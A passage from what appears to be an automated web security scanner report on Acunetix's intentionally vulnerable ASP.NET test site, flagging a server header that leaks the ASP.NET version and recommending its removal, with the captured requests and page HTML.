title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/login.aspx
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:17 GMT Content-Length: 13269Response body (13269 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMT Content-Length: 22687Response body (22687 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" 